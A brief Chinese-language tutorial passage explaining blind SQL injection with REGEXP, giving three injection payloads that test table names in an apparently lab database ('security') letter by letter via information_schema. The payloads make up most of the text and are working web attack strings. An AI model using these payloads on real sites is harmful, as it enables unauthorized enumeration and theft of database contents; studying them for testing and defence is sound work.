直接查询自己需要的数据,然后通过正则表达式进行匹配 用于盲注中
regexp ‘1’ 判断一个表的第一个字符串是否在a-z中
and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="security" AND table_name REGEXP '^[a-z]' LIMIT 0,1)
# 判断第一个字符是不是 a-z
regexp ‘^e’ 判断第一个字符串是否为e
and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="security" AND table_name REGEXP '^e' LIMIT 0,1)
# 判断第一个字符是不是 e
regexp ‘^e[a-z]’ 判断一个表的第二个字符串是否在a-z中
and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="security" AND table_name REGEXP '^e[a-z]' LIMIT 0,1)
a-z↩︎